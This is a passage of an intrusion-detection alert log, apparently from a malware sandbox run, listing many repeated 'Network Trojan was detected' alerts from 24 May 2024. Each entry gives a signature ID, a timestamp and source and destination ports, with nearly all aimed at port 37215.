              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503238
              SID:2829579
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536559
              SID:2829579
              Source Port:40032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446908
              SID:2829579
              Source Port:57016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491743
              SID:2829579
              Source Port:54236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186199
              SID:2829579
              Source Port:36658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130269
              SID:2835222
              Source Port:35014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355366
              SID:2829579
              Source Port:34022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624372
              SID:2829579
              Source Port:44812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507135
              SID:2829579
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431391
              SID:2829579
              Source Port:47386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:09.216729
              SID:2030490
              Source Port:38592
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062711
              SID:2829579
              Source Port:40648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394462
              SID:2829579
              Source Port:39014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.104992
              SID:2835222
              Source Port:52842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391324
              SID:2835222
              Source Port:59028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382953
              SID:2829579
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447835
              SID:2835222
              Source Port:57452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822959
              SID:2835222
              Source Port:58020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188847
              SID:2829579
              Source Port:45204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118276
              SID:2835222
              Source Port:34072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520283
              SID:2835222
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661358
              SID:2829579
              Source Port:51412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404303
              SID:2835222
              Source Port:48830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282299
              SID:2829579
              Source Port:40860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533314
              SID:2835222
              Source Port:54042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230804
              SID:2829579
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816112
              SID:2829579
              Source Port:59570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979771
              SID:2835222
              Source Port:40936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598186
              SID:2835222
              Source Port:41658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343028
              SID:2835222
              Source Port:53954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123161
              SID:2835222
              Source Port:56648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579523
              SID:2829579
              Source Port:51772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575283
              SID:2835222
              Source Port:49266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449869
              SID:2829579
              Source Port:45834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157605
              SID:2835222
              Source Port:57806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459554
              SID:2835222
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982354
              SID:2835222
              Source Port:45970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623716
              SID:2829579
              Source Port:48498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397268
              SID:2835222
              Source Port:53636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681021
              SID:2829579
              Source Port:45860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549159
              SID:2835222
              Source Port:36440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.417085
              SID:2835222
              Source Port:57700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485229
              SID:2829579
              Source Port:48614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401463
              SID:2835222
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991982
              SID:2829579
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329717
              SID:2829579
              Source Port:46874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991108
              SID:2835222
              Source Port:33672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371934
              SID:2829579
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483447
              SID:2829579
              Source Port:56610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250782
              SID:2829579
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394383
              SID:2835222
              Source Port:36008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766273
              SID:2829579
              Source Port:40416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467880
              SID:2829579
              Source Port:51510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070093
              SID:2835222
              Source Port:40690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061477
              SID:2835222
              Source Port:32930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289303
              SID:2835222
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122022
              SID:2829579
              Source Port:44994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976663
              SID:2835222
              Source Port:47204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575771
              SID:2835222
              Source Port:52976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443562
              SID:2835222
              Source Port:50220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873976
              SID:2829579
              Source Port:50962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491540
              SID:2835222
              Source Port:56878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574725
              SID:2835222
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053960
              SID:2835222
              Source Port:56260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542182
              SID:2835222
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343660
              SID:2835222
              Source Port:54136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572030
              SID:2835222
              Source Port:56316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540023
              SID:2835222
              Source Port:58986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098214
              SID:2835222
              Source Port:51520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205263
              SID:2829579
              Source Port:40188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404540
              SID:2835222
              Source Port:50682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575180
              SID:2829579
              Source Port:40776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.862014
              SID:2829579
              Source Port:57320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166333
              SID:2835222
              Source Port:50792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538555
              SID:2829579
              Source Port:44910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802463
              SID:2835222
              Source Port:52326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433428
              SID:2835222
              Source Port:35742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303244
              SID:2829579
              Source Port:45534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799004
              SID:2829579
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378052
              SID:2835222
              Source Port:39436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061425
              SID:2829579
              Source Port:60874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568664
              SID:2829579
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430066
              SID:2829579
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.877825
              SID:2835222
              Source Port:35794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207623
              SID:2835222
              Source Port:41674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797072
              SID:2829579
              Source Port:44780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878352
              SID:2829579
              Source Port:52126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245334
              SID:2829579
              Source Port:57714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796382
              SID:2829579
              Source Port:50640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394887
              SID:2835222
              Source Port:56280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485773
              SID:2829579
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116061
              SID:2829579
              Source Port:34554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113432
              SID:2835222
              Source Port:39574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884737
              SID:2829579
              Source Port:34392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109295
              SID:2835222
              Source Port:50574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445274
              SID:2835222
              Source Port:41128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457036
              SID:2829579
              Source Port:59320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411152
              SID:2835222
              Source Port:42018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859526
              SID:2829579
              Source Port:54954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608365
              SID:2829579
              Source Port:45400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113447
              SID:2835222
              Source Port:59392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536641
              SID:2835222
              Source Port:53312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458352
              SID:2835222
              Source Port:37176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865448
              SID:2829579
              Source Port:35292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445082
              SID:2829579
              Source Port:60198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507616
              SID:2829579
              Source Port:54642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398307
              SID:2829579
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333982
              SID:2835222
              Source Port:39010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374565
              SID:2829579
              Source Port:45828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057269
              SID:2829579
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279082
              SID:2835222
              Source Port:58048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061406
              SID:2829579
              Source Port:39564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638829
              SID:2829579
              Source Port:36242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449984
              SID:2829579
              Source Port:42422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537645
              SID:2835222
              Source Port:51228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245356
              SID:2829579
              Source Port:43062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705458
              SID:2829579
              Source Port:58450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411877
              SID:2829579
              Source Port:48410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641562
              SID:2835222
              Source Port:46750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098195
              SID:2835222
              Source Port:52808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200714
              SID:2835222
              Source Port:46866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358595
              SID:2829579
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581678
              SID:2835222
              Source Port:60808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111437
              SID:2835222
              Source Port:57640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826834
              SID:2835222
              Source Port:54166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247821
              SID:2835222
              Source Port:33260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116540
              SID:2835222
              Source Port:39040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870198
              SID:2829579
              Source Port:54052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279179
              SID:2835222
              Source Port:54444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621660
              SID:2829579
              Source Port:42546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269928
              SID:2829579
              Source Port:59430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113297
              SID:2835222
              Source Port:51352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383389
              SID:2835222
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481893
              SID:2829579
              Source Port:42728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079880
              SID:2835222
              Source Port:34314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573333
              SID:2835222
              Source Port:42516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878012
              SID:2835222
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458391
              SID:2829579
              Source Port:40766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548261
              SID:2829579
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071455
              SID:2829579
              Source Port:35284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450187
              SID:2835222
              Source Port:40868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681000
              SID:2829579
              Source Port:59276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.069006
              SID:2829579
              Source Port:55830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333958
              SID:2835222
              Source Port:47416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303308
              SID:2829579
              Source Port:48692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443620
              SID:2829579
              Source Port:57642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503961
              SID:2835222
              Source Port:36822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575805
              SID:2829579
              Source Port:46234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534305
              SID:2835222
              Source Port:51596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833213
              SID:2835222
              Source Port:32826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495284
              SID:2835222
              Source Port:54000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595006
              SID:2835222
              Source Port:47944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526872
              SID:2835222
              Source Port:47876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830606
              SID:2835222
              Source Port:47672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187404
              SID:2829579
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447928
              SID:2829579
              Source Port:44596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801930
              SID:2829579
              Source Port:58726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063060
              SID:2835222
              Source Port:48378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360989
              SID:2835222
              Source Port:41436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432320
              SID:2835222
              Source Port:36460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477118
              SID:2835222
              Source Port:46054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538150
              SID:2829579
              Source Port:59074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445589
              SID:2829579
              Source Port:55532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128205
              SID:2835222
              Source Port:39100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516616
              SID:2835222
              Source Port:54692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100804
              SID:2835222
              Source Port:55980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517166
              SID:2835222
              Source Port:59050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396186
              SID:2829579
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545588
              SID:2829579
              Source Port:35532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.699473
              SID:2829579
              Source Port:43934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383301
              SID:2835222
              Source Port:57800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634116
              SID:2835222
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425521
              SID:2829579
              Source Port:54096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492451
              SID:2835222
              Source Port:44420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814729
              SID:2835222
              Source Port:42212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341404
              SID:2835222
              Source Port:41594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553602
              SID:2835222
              Source Port:48298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120439
              SID:2835222
              Source Port:40116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878719
              SID:2829579
              Source Port:40006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152853
              SID:2835222
              Source Port:33550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513383
              SID:2829579
              Source Port:54574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505676
              SID:2835222
              Source Port:52750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547067
              SID:2829579
              Source Port:51602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365367
              SID:2829579
              Source Port:42640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489581
              SID:2835222
              Source Port:56372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195202
              SID:2835222
              Source Port:44604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372512
              SID:2835222
              Source Port:58950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425446
              SID:2829579
              Source Port:53688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707110
              SID:2835222
              Source Port:36848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063910
              SID:2829579
              Source Port:44432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098841
              SID:2835222
              Source Port:36558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459805
              SID:2835222
              Source Port:43720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061919
              SID:2835222
              Source Port:41878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576391
              SID:2835222
              Source Port:49222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061812
              SID:2835222
              Source Port:41978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161302
              SID:2829579
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857484
              SID:2835222
              Source Port:50504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
